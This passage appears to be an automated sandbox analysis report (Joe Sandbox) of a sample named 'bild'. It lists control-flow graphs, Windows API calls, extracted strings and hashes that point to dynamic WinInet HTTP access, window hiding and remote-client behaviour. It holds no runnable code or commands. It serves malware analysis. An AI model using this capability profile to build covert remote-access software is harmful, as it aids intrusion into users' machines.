                                                                                  • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                  • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                  • API String ID: 3291243470-2792520954
                                                                                  • Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                  • Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
                                                                                  • Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                  • Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 844 11029590-1102961e LoadLibraryA 845 11029621-11029626 844->845 846 11029628-1102962b 845->846 847 1102962d-11029630 845->847 848 11029645-1102964a 846->848 849 11029632-11029635 847->849 850 11029637-11029642 847->850 851 11029679-11029685 848->851 852 1102964c-11029651 848->852 849->848 850->848 853 1102972a-1102972d 851->853 854 1102968b-110296a3 call 11162b51 851->854 855 11029653-1102966a GetProcAddress 852->855 856 1102966c-1102966f 852->856 858 11029748-11029760 InternetOpenA 853->858 859 1102972f-11029746 GetProcAddress 853->859 865 110296c4-110296d0 854->865 866 110296a5-110296be GetProcAddress 854->866 855->856 860 11029671-11029673 SetLastError 855->860 856->851 863 11029784-11029790 call 11162be5 858->863 859->858 862 11029779-11029781 SetLastError 859->862 860->851 862->863 872 11029796-110297c7 call 11142290 call 11164390 863->872 873 11029a0a-11029a14 863->873 871 110296d2-110296db GetLastError 865->871 874 110296f1-110296f3 865->874 866->865 868 11029762-1102976a SetLastError 866->868 868->871 871->874 875 110296dd-110296ef call 11162be5 call 11162b51 871->875 894 110297c9-110297cc 872->894 895 110297cf-110297e4 call 11081a70 * 2 872->895 873->845 877 11029a1a 873->877 879 11029710-1102971c 874->879 880 110296f5-1102970e GetProcAddress 874->880 875->874 882 11029a2c-11029a2f 877->882 879->853 898 1102971e-11029727 879->898 880->879 886 1102976f-11029777 SetLastError 880->886 883 11029a31-11029a36 882->883 884 11029a3b-11029a3e 882->884 890 11029b9f-11029ba7 883->890 891 11029a40-11029a45 884->891 892 11029a4a 884->892 886->853 896 11029bb0-11029bc3 890->896 897 11029ba9-11029baa FreeLibrary 890->897 899 11029b6f-11029b74 891->899 900 11029a4d-11029a55 892->900 894->895 918 110297e6-110297ea 895->918 919 110297ed-110297f9 895->919 897->896 898->853 905 11029b76-11029b8d GetProcAddress 899->905 906 11029b8f-11029b95 899->906 903 11029a57-11029a6e GetProcAddress 900->903 904 11029a74-11029a7d 900->904 903->904 908 11029b2e-11029b30 SetLastError 903->908 912 11029a80-11029a82 904->912 905->906 909 11029b97-11029b99 SetLastError 905->909 906->890 910 11029b36-11029b3d 908->910 909->890 914 11029b4c-11029b6d call 110278a0 * 2 910->914 912->910 916 11029a88-11029a8d 912->916 914->899 916->914 920 11029a93-11029acf call 1110f4a0 call 11027850 916->920 918->919 922 11029824-11029829 919->922 923 110297fb-110297fd 919->923 942 11029ae1-11029ae3 920->942 943 11029ad1-11029ad4 920->943 925 1102982b-1102983c GetProcAddress 922->925 926 1102983e-11029855 InternetConnectA 922->926 928 11029814-1102981a 923->928 929 110297ff-11029812 GetProcAddress 923->929 925->926 931 11029881-1102988c SetLastError 925->931 932 110299f7-11029a07 call 111618c1 926->932 933 1102985b-1102985e 926->933 928->922 929->928 935 1102981c-1102981e SetLastError 929->935 931->932 932->873 938 11029860-11029862 933->938 939 11029899-110298a1 933->939 935->922 944 11029864-11029877 GetProcAddress 938->944 945 11029879-1102987f 938->945 946 110298a3-110298b7 GetProcAddress 939->946 947 110298b9-110298d4 939->947 950 11029ae5 942->950 951 11029aec-11029af1 942->951 943->942 949 11029ad6-11029ada 943->949 944->945 952 11029891-11029893 SetLastError 944->952 945->939 946->947 953 110298d6-110298de SetLastError 946->953 954 110298e1-110298e4 947->954 949->942 955 11029adc 949->955 950->951 956 11029af3-11029b09 call 110d1090 951->956 957 11029b0c-11029b0e 951->957 952->939 953->954 960 110299f2-110299f5 954->960 961 110298ea-110298ef 954->961 955->942 956->957 963 11029b10-11029b12 957->963 964 11029b14-11029b25 call 111618c1 957->964 960->932 967 11029a1c-11029a29 call 111618c1 960->967 965 110298f1-11029908 GetProcAddress 961->965 966 1102990a-11029916 961->966 963->964 969 11029b3f-11029b49 call 111618c1 963->969 964->914 979 11029b27-11029b29 964->979 965->966 971 11029918-11029920 SetLastError 965->971 978 11029922-1102993b GetLastError 966->978 967->882 969->914 971->978 980 11029956-1102996b 978->980 981 1102993d-11029954 GetProcAddress 978->981 979->900 984 11029975-11029983 GetLastError 980->984 981->980 982 1102996d-1102996f SetLastError 981->982 982->984 985 11029985-1102998a 984->985 986 1102998c-11029998 GetDesktopWindow 984->986 985->986 989 110299e2-110299e7 985->989 987 110299b3-110299cf 986->987 988 1102999a-110299b1 GetProcAddress 986->988 987->960 993 110299d1 987->993 988->987 990 110299d6-110299e0 SetLastError 988->990 989->960 991 110299e9-110299ef 989->991 990->960 991->960 993->954
                                                                                  APIs
                                                                                  • LoadLibraryA.KERNEL32(WinInet.dll,AD96CFBE,759223A0,?,00000000), ref: 110295C5
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029673
                                                                                  • _malloc.LIBCMT ref: 11029697
                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
                                                                                  • GetLastError.KERNEL32 ref: 110296D2
                                                                                  • _free.LIBCMT ref: 110296DE
                                                                                  • _malloc.LIBCMT ref: 110296E7
                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
                                                                                  • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
                                                                                  • InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029764
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029771
                                                                                  • SetLastError.KERNEL32(00000078), ref: 1102977B
                                                                                  • _free.LIBCMT ref: 11029785
                                                                                    • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                    • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
                                                                                  • SetLastError.KERNEL32(00000078), ref: 1102981E
                                                                                  • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                  • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                  • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                  • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                  • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                  • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                  • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                  • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                  • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                  • API String ID: 921868004-913974648
                                                                                  • Opcode ID: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                  • Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
                                                                                  • Opcode Fuzzy Hash: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                  • Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60
                                                                                  APIs
                                                                                    • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,02B6B888,000000FF,?), ref: 11144ED5
                                                                                    • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,02B6B888,000000FF,?), ref: 11144EE5
                                                                                  • _fgets.LIBCMT ref: 11061DC2
                                                                                  • _strpbrk.LIBCMT ref: 11061E29
                                                                                  • _fgets.LIBCMT ref: 11061F2C
                                                                                  • _strpbrk.LIBCMT ref: 11061FA3
                                                                                  • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                  • _fgets.LIBCMT ref: 11062035
                                                                                  • _strpbrk.LIBCMT ref: 1106205B
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                  • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                  • API String ID: 716802716-1571441106
                                                                                  • Opcode ID: 138079b93c76e623c3914dadf52ec1966105b04443ff76c6d6b694830cc74feb
                                                                                  • Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
                                                                                  • Opcode Fuzzy Hash: 138079b93c76e623c3914dadf52ec1966105b04443ff76c6d6b694830cc74feb
                                                                                  • Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1646 11143570-111435b1 GetModuleFileNameA 1647 111435f3 1646->1647 1648 111435b3-111435c6 call 11081b40 1646->1648 1650 111435f9-111435fd 1647->1650 1648->1647 1654 111435c8-111435f1 LoadLibraryA 1648->1654 1652 111435ff-1114360c LoadLibraryA 1650->1652 1653 11143619-11143637 GetModuleHandleA GetProcAddress 1650->1653 1652->1653 1655 1114360e-11143616 LoadLibraryA 1652->1655 1656 11143647-11143670 GetProcAddress * 4 1653->1656 1657 11143639-11143645 1653->1657 1654->1650 1655->1653 1658 11143673-111436eb GetProcAddress * 10 call 11161d01 1656->1658 1657->1658 1660 111436f0-111436f3 1658->1660
                                                                                  APIs
                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,759223A0), ref: 111435A3
                                                                                  • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                  • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                  • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                  • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                  • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                  • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                  • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                  • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                  • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                  • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                  • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                  • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                  • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                    • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: AddressProc$LibraryLoad$Module$FileHandleName_strrchr
                                                                                  • String ID: DBGHELP.DLL$IMAGEHLP.DLL$MiniDumpWriteDump$StackWalk$SymCleanup$SymFunctionTableAccess$SymGetLineFromAddr$SymGetLineFromName$SymGetLineNext$SymGetLinePrev$SymGetModuleInfo$SymGetOptions$SymGetSymFromAddr$SymInitialize$SymLoadModule$SymMatchFileName$SymSetOptions$dbghelp.dll
                                                                                  • API String ID: 3874234733-2061581830
                                                                                  • Opcode ID: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                  • Instruction ID: 707b91cc949213dae1a505c6abf15ec2f20ed18dfa7402eb99b54f6ccfa65761
                                                                                  • Opcode Fuzzy Hash: cfe4e0547bd5fe59c7f15dfeaa5816d95d94d48cef7707ac470bf4deacf2edb6
                                                                                  • Instruction Fuzzy Hash: 05411B70A04714AFD7309F768D84A6BFAF8BF55A04B10492EE496D3A10EBB5E8008F5D

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1727 11139090-111390c5 1728 111390d2-111390d9 1727->1728 1729 111390c7-111390cd GetCurrentThreadId 1727->1729 1730 111390e0-111390fc call 11133920 call 11133400 1728->1730 1731 111390db call 11029330 1728->1731 1729->1728 1737 11139102-11139108 1730->1737 1738 111391db-111391e2 1730->1738 1731->1730 1741 1113975a-11139775 call 11161d01 1737->1741 1742 1113910e-1113916f call 11138c30 IsWindow IsWindowVisible call 11146450 call 1105dd10 IsWindowVisible 1737->1742 1739 1113929a-111392b0 1738->1739 1740 111391e8-111391ef 1738->1740 1752 111392b6-111392bd 1739->1752 1753 111393ef 1739->1753 1740->1739 1743 111391f5-111391fc 1740->1743 1774 111391d1 1742->1774 1775 11139171-11139177 1742->1775 1743->1739 1746 11139202-11139211 FindWindowA 1743->1746 1746->1739 1751 11139217-1113921c IsWindowVisible 1746->1751 1751->1739 1755 1113921e-11139225 1751->1755 1756 111392bf-111392c9 1752->1756 1757 111392ce-111392ee call 1105dd10 1752->1757 1758 111393f1-11139402 1753->1758 1759 11139435-11139440 1753->1759 1755->1739 1761 11139227-1113924c call 11138c30 IsWindowVisible 1755->1761 1756->1759 1757->1759 1780 111392f4-11139323 1757->1780 1763 11139404-11139414 1758->1763 1764 1113941a-1113942f 1758->1764 1765 11139442-11139462 call 1105dd10 1759->1765 1766 11139476-1113947c 1759->1766 1761->1739 1786 1113924e-1113925d IsIconic 1761->1786 1763->1764 1764->1759 1782 11139470 1765->1782 1783 11139464-1113946e call 1102cff0 1765->1783 1768 1113947e-1113948a call 11138c30 1766->1768 1769 1113948d-11139495 1766->1769 1768->1769 1778 111394a7 1769->1778 1779 11139497-111394a2 call 1106b860 1769->1779 1774->1738 1775->1774 1784 11139179-11139190 call 11146450 GetForegroundWindow 1775->1784 1788 111394a7 call 1112ce90 1778->1788 1779->1778 1797 11139325-11139339 call 11081a70 1780->1797 1798 1113933e-11139351 call 11143230 1780->1798 1782->1766 1783->1766 1805 11139192-111391bc EnableWindow call 11131210 * 2 EnableWindow 1784->1805 1806 111391be-111391c0 1784->1806 1786->1739 1791 1113925f-1113927a GetForegroundWindow call 11131210 * 2 1786->1791 1793 111394ac-111394b2 1788->1793 1827 1113928b-11139294 EnableWindow 1791->1827 1828 1113927c-11139282 1791->1828 1799 111394b4-111394ba call 11131b00 1793->1799 1800 111394bd-111394c6 1793->1800 1797->1798 1818 1113933b 1797->1818 1819 11139353-11139364 GetLastError call 11146450 1798->1819 1820 1113936e-11139375 1798->1820 1799->1800 1803 111394d4 call 111317a0 1800->1803 1804 111394c8-111394cb 1800->1804 1812 111394d9-111394df 1803->1812 1804->1812 1813 111394cd-111394d2 call 11131870 1804->1813 1805->1806 1806->1774 1816 111391c2-111391c8 1806->1816 1822 111394e5-111394eb 1812->1822 1823 111395e9-111395f4 call 111386b0 1812->1823 1813->1812 1816->1774 1825 111391ca-111391cb SetForegroundWindow 1816->1825 1818->1798 1819->1820 1831 11139377-11139392 1820->1831 1832 111393e8 1820->1832 1833 111394f1-111394f9 1822->1833 1834 1113959b-111395a3 1822->1834 1843 111395f6-11139608 call 110637c0 1823->1843 1844 11139615-1113961b 1823->1844 1825->1774 1827->1739 1828->1827 1838 11139284-11139285 SetForegroundWindow 1828->1838 1846 11139395-111393a1 1831->1846 1832->1753 1833->1823 1841 111394ff-11139505 1833->1841 1834->1823 1839 111395a5-111395e3 call 1103f000 call 1103f040 call 1103f060 call 1103f020 call 1110f270 1834->1839 1838->1827 1839->1823 1841->1823 1847 1113950b-11139522 call 1110f420 1841->1847 1843->1844 1864 1113960a-11139610 call 11142210 1843->1864 1850 11139621-11139628 1844->1850 1851 1113974a-11139752 1844->1851 1852 111393a3-111393b7 call 11081a70 1846->1852 1853 111393bc-111393c9 call 11143230 1846->1853 1861 11139544 1847->1861 1862 11139524-11139542 call 110573b0 1847->1862 1850->1851 1858 1113962e-11139647 call 1105dd10 1850->1858 1851->1741 1852->1853 1874 111393b9 1852->1874 1853->1832 1869 111393cb-111393e6 GetLastError call 11146450 1853->1869 1858->1851 1879 1113964d-11139660 1858->1879 1870 11139546-11139592 call 1110f260 call 1104ce00 call 1104e340 call 1104e3b0 call 1104ce40 1861->1870 1862->1870 1864->1844 1869->1759 1870->1823 1907 11139594-11139599 call 110ebf30 1870->1907 1874->1853 1888 11139662-11139668 1879->1888 1889 1113968d-11139693 1879->1889 1890 11139699-111396a5 GetTickCount 1888->1890 1893 1113966a-11139688 call 11146450 GetTickCount 1888->1893 1889->1851 1889->1890 1890->1851 1895 111396ab-111396eb call 11142e80 call 11146ee0 call 11142e80 call 11025bb0 1890->1895 1893->1851 1913 111396f0-111396f5 1895->1913 1907->1823 1913->1913 1914 111396f7-111396fd 1913->1914 1915 11139700-11139705 1914->1915 1915->1915 1916 11139707-11139731 call 1112c7a0 1915->1916 1919 11139733-11139734 FreeLibrary 1916->1919 1920 1113973a-11139747 call 111618c1 1916->1920 1919->1920 1920->1851
                                                                                  APIs
                                                                                  • GetCurrentThreadId.KERNEL32 ref: 111390C7
                                                                                  • IsWindow.USER32(00020492), ref: 11139125
                                                                                  • IsWindowVisible.USER32(00020492), ref: 11139133
                                                                                  • IsWindowVisible.USER32(00020492), ref: 1113916B
                                                                                  • GetForegroundWindow.USER32 ref: 11139186
                                                                                  • EnableWindow.USER32(00020492,00000000), ref: 111391A0
                                                                                  • EnableWindow.USER32(00020492,00000001), ref: 111391BC
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 111391CB
                                                                                  • FindWindowA.USER32(Shell_TrayWnd,00000000), ref: 11139209
                                                                                  • IsWindowVisible.USER32(00000000), ref: 11139218
                                                                                  • IsWindowVisible.USER32(00020492), ref: 11139248
                                                                                  • IsIconic.USER32(00020492), ref: 11139255
                                                                                  • GetForegroundWindow.USER32 ref: 1113925F
                                                                                    • Part of subcall function 11131210: ShowWindow.USER32(00020492,00000000,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131234
                                                                                    • Part of subcall function 11131210: ShowWindow.USER32(00020492,11139062,?,11139062,00000007,?,?,?,?,?,00000000), ref: 11131246
                                                                                  • SetForegroundWindow.USER32(00000000), ref: 11139285
                                                                                  • EnableWindow.USER32(00020492,00000001), ref: 11139294
                                                                                  • GetLastError.KERNEL32 ref: 11139353
                                                                                  • GetLastError.KERNEL32 ref: 111393CB
                                                                                  • GetTickCount.KERNEL32 ref: 11139678
                                                                                  • GetTickCount.KERNEL32 ref: 11139699
                                                                                    • Part of subcall function 11025BB0: LoadLibraryA.KERNEL32(Wtsapi32.dll,00000000,111396E2), ref: 11025BB8
                                                                                  • FreeLibrary.KERNEL32(?,00000000,000000FF,00000000,00000001,00000000,00000001,00000000,0000000A,?,00000000), ref: 11139734
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890074972.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890116495.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890140346.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  • Associated: 00000002.00000002.3890159496.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_2_2_11000000_bild.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: Window$ForegroundVisible$Enable$CountErrorLastLibraryShowTick$CurrentFindFreeIconicLoadThread
                                                                                  • String ID: Audio$Client$File <%s> doesnt exist, e=%d$HideWhenIdle$HookDirectSound$MainWnd = %08x, visible %d, valid %d$NeedsReinstall$Reactivate main window$Shell_TrayWnd$ShowNeedsReinstall in 15, user=%s$disableRunplugin
                                                                                  • API String ID: 2511061093-2542869446
                                                                                  • Opcode ID: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                  • Instruction ID: 168a4b77644d94df8a921335772b55db7e1a21360cf08f879ca3086e41f0bcfd
                                                                                  • Opcode Fuzzy Hash: 0e4ccee009b06b63fab7a686928084bc30871ce576c3106fc105d812773a0109
                                                                                  • Instruction Fuzzy Hash: 700229B8A1062ADFE716DFA4CDD4B6AF766BBC071EF500178E4255728CEB30A844CB51
                                                                                  APIs
                                                                                  • CoInitialize.OLE32(00000000), ref: 11115BC5
                                                                                  • CoCreateInstance.OLE32(111C081C,00000000,00000001,111C082C,00000000,?,00000000,Client,silent,00000000,00000000,?,1104BADF), ref: 11115BDF
                                                                                  • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000000,Client,silent,00000000,00000000), ref: 11115C04
                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSettings), ref: 11115C16
                                                                                  • SHGetSettings.SHELL32(?,00000200,?,00000000,Client,silent,00000000,00000000), ref: 11115C29
                                                                                  • FreeLibrary.KERNEL32(00000000,?,00000000,Client,silent,00000000,00000000), ref: 11115C35
                                                                                  • CoUninitialize.COMBASE(00000000), ref: 11115CD1
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000002.00000002.3889946977.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                  • Associated: 00000002.00000002.3889926008.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
